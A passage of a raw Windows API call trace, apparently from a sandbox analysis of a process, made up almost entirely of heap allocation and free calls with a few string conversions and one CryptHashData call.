dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fb8 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fa8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0259.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51c58 [0259.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51c58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0259.405] CryptHashData (hHash=0xa86f50, pbData=0x2e54fb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.406] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.407] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.407] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.408] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bf8 [0259.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.409] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: 